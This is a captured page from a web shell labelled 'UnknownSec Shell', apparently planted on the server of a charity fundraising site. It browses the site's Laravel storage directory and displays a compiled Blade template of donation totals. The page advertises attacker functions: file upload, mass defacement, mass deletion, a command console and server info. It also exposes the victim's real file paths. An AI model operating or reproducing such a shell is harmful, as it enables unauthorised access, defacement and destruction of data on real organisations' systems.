shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
storage
/
framework
/
views
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
73770402ec3c6931a8aa9566f9535435.php
<div> <div class="max-w-6xl px-6 md:px-0 mx-auto"> <p class="text-center text-xl mb-2">Thank you for helping us raise</p> <div class="mb-2 text-6xl text-center font-bold text-mp-blue-green">$<?php echo e(number_format( $sponsor_total + $gift_total + $donation_total, 0, ',' )); ?></div> <p class="text-center text-xl mb-8">to support the survivors of interpersonal violence</p> <div class="grid md:grid-cols-4 gap-8 mb-8"> <div class="flex flex-col p-8 text-center text-white bg-mp-coral rounded-lg shadow-md"> <div class="mb-6 font-display"><i class="fa fa-star fa-2x"></i></div> <div class="mb-6 text-5xl font-bold"><?php echo e(App\Models\Gift::where('created_at', '>', date('Y').'-01-01')->get()->count() + $outside_donors); ?></div> <div class="mb-4 text-xl uppercase">Donors</div> </div> <div class="flex flex-col p-8 text-center text-white bg-mp-light-lime rounded-lg shadow-md"> <div class="mb-6 font-display"><i class="fa fa-gift fa-2x"></i></div> <div class="mb-6 text-5xl font-bold"><?php echo e(DB::table('gift_item')->select(DB::raw('SUM(item_quantity) as quantity'))->where('created_at', '>', date('Y').'-01-01')->first()->quantity); ?></div> <div class="mb-4 text-xl uppercase">Items Given</div> </div> <div class="flex flex-col p-8 text-center text-white bg-mp-blue-green rounded-lg shadow-md"> <div class="mb-6 font-display"><i class="fa fa-heart fa-2x"></i></div> <div class="mb-6 text-5xl font-bold">$<?php echo e(number_format( $gift_total + $donation_total )); ?></div> <div class="mb-4 text-xl uppercase"> Donations </div> </div> <div class="flex flex-col p-8 text-center text-white bg-mp-navy rounded-lg shadow-md"> <div class="mb-6 font-display"><i class="fa fa-trophy fa-2x"></i></div> <div class="mb-6 text-5xl font-bold">$<?php echo e(number_format( $sponsor_total, 0, ',' )); ?></div> <div class="mb-4 text-xl uppercase"> Sponsors </div> </div> </div> <div class="mt-12 text-center"> <!--[if BLOCK]><![endif]--><?php if( getCurrentPeriod() == 'during' ): ?> <a href="/catalog" class="mx-auto px-4 py-4 text-mp-blue-green border border-mp-blue-green border-2 rounded-full hover:bg-mp-light-lime hover:text-black hover:border-white">Shop the Giving Catalog</a> <?php endif; ?><!--[if ENDBLOCK]><![endif]--> </div> </div> </div> <?php /**PATH /home/forge/mpc.brannanatkinson.com/resources/views/livewire/results.blade.php ENDPATH**/ ?>
© 2026 UnknownSec